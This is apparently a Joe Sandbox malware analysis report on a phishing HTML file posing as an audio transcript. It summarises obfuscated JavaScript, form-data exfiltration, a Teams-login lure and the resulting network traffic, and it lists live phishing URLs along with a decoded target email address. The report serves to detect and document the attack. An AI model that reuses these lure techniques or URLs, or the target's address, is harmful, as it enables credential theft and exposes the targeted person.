Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AudioplaybackVM--00-32AoTranscript.html

Overview

General Information

Sample name:AudioplaybackVM--00-32AoTranscript.html
Analysis ID:1567690
MD5:22b8f5e0dad9c955afa3dc984e1bb0ce
SHA1:32298f78ac9da227feddd5c467f21132f44d0014
SHA256:129f577e1a61269c842aa52229daa4aac69cb31739cabf2c9911e608fc3209f8
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML document with suspicious name
HTML document with suspicious title
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 2852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\AudioplaybackVM--00-32AoTranscript.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,1170405729456523145,12135267861160028348,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://j9lg.xbyhiqbjl.com/admi/#X#YnJ5YW5faGFydG1...High-risk script with multiple red flags: uses atob() for obfuscation, contains encoded malicious URL (xbyhiqbjl.com), implements anti-debugging measures, blocks developer tools, contains heavily obfuscated code, and uses document.write() for DOM manipulation. The script appears designed to evade detection and execute potentially harmful code.
Source: 0.1.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/AudioplaybackVM--00...This code contains multiple high-risk indicators: 1) Uses eval through obfuscated means (atob('ZXZhbA==')), 2) Heavy obfuscation using Unicode characters and binary conversion, 3) Dynamic code execution through Function constructor, 4) Contains an encoded email address from a government domain (uscourts.gov), suggesting potential targeting of government employees. The code appears designed to evade detection while executing malicious payloads.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://j9lg.xbyhiqbjl.com/admi/#X#YnJ5YW5faGFydG1...High-risk script showing multiple suspicious behaviors: 1) Makes requests to a suspicious Russian domain (.ru) with an unusually long subdomain, 2) Contains obfuscated variable names, 3) Performs form data exfiltration via POST request, 4) Uses redirects to Microsoft Teams as a possible legitimacy cover, 5) Implements Cloudflare Turnstile but appears to be part of a credential harvesting operation. Pattern matches typical phishing behavior.
Source: AudioplaybackVM--00-32AoTranscript.htmlHTTP Parser: Low number of body elements: 0
Source: file:///C:/Users/user/Desktop/AudioplaybackVM--00-32AoTranscript.htmlTab title: AudioplaybackVM--00-32AoTranscript.html
Source: https://teams.microsoft.com/v2/HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=https%3A%2F%2Fapi.spaces.skype.com%2F.default%20openid%20profile%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=Core-71f87d5e-3bde-4d88-896e-56face5517c3&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=kuGaHImTNtocV00g6D-oubO33HrUmb1x4CVLj1eNh4w&code_challenge_method=S256&prompt=none&nonce=01938dae-b5c7-7044-9950-4dce79e8928a&state=eyJpZCI6IjAxOTM4ZGFlLWI1YzctN2YxNy04OGUyLTdhOTYwM2NmY2RhMyIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoic2lsZW50In19&sso_reload=true microsoft microsoftonline
Source: https://teams.microsoft.com/v2/HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: Number of links: 0
Source: AudioplaybackVM--00-32AoTranscript.htmlHTTP Parser: Base64 decoded: bryan_hartman@ao.uscourts.gov
Source: https://teams.microsoft.com/v2/HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: <input type="password" .../> found
Source: AudioplaybackVM--00-32AoTranscript.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/AudioplaybackVM--00-32AoTranscript.htmlHTTP Parser: No favicon
Source: https://j9lg.xbyhiqbjl.com/admi/#X#YnJ5YW5faGFydG1hbkBhby51c2NvdXJ0cy5nb3Y=HTTP Parser: No favicon
Source: https://teams.microsoft.com/v2/HTTP Parser: No favicon
Source: https://teams.microsoft.com/v2/HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="author".. found
Source: https://teams.microsoft.com/v2/HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=5e3ce6c0-2b1f-4285-8d4b-75ee78787346&scope=openId%20profile%20openid%20offline_access&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fv2&client-request-id=01938dae-e98c-7eb1-836d-55da1ab33ab6&response_mode=fragment&response_type=code&x-client-SKU=msal.js.browser&x-client-VER=3.24.0&client_info=1&code_challenge=8eW4JRX-aaVfoFneuP3txfGhGb5o4vnSs6PJTvzoTsY&code_challenge_method=S256&nonce=01938dae-e98d-7081-a23a-2cd500468707&state=eyJpZCI6IjAxOTM4ZGFlLWU5OGMtN2Q0OS04NjY0LTY3OWZmNTE2NzczYiIsIm1ldGEiOnsiaW50ZXJhY3Rpb25UeXBlIjoicmVkaXJlY3QifX0%3DHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49996 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 13.107.246.43 13.107.246.43
Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f6a394c672e786279686971626a6c2e636f6d2f61646d692f-oakwood HTTP/1.1Host: karaokebooks.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /admi/ HTTP/1.1Host: j9lg.xbyhiqbjl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dP4PbSHbpM+gPBT&MD=utld16HU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ec5727f9d0241a1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
